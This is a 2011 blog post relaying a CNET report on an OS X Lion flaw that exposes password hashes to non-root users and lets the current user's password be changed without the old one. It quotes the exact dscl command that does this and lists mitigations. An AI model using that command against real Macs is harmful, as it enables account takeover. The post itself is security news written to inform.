OS X Lion security flaw allows anyone to change your password

Posted: September 20, 2011 in Apple, Lion, Mac, Security
Tags: , , , , , , , ,

Security blog Defense in Depth has found a glaring security flaw in OS X Lion that enables hackers to change the password of any user on a machine running Lion. “[While] non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data,” Patrick Dunstan from Defense in Depth explained in a recent blog post. The result is that anyone could use a simple Python script, created by Dunstan himself, to discover a user’s password. It gets worse. Reportedly, OS X Lion does not require its users to enter a password to change the login credentials of the current user.

That means typing the command:

dscl localhost -passwd /Search/Users/CoreBuilder

will actually prompt you to set a new password for CoreBuilder. As CNET points out, a hacker could only take advantage of the known bug if he or she has local access to the computer and Directory Service access.

CNET suggests disabling automatic log-in, enabling sleep and screensaver passwords and disabling guest accounts as some preventative measures to keep your Mac secure.

[Via CNET]

Advertisements
Comments
  1. 中和租屋 says:

    Wow! This can be 1 of the top blogs I’ve actually arrive throughout on this subject. Merely Magnificent

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s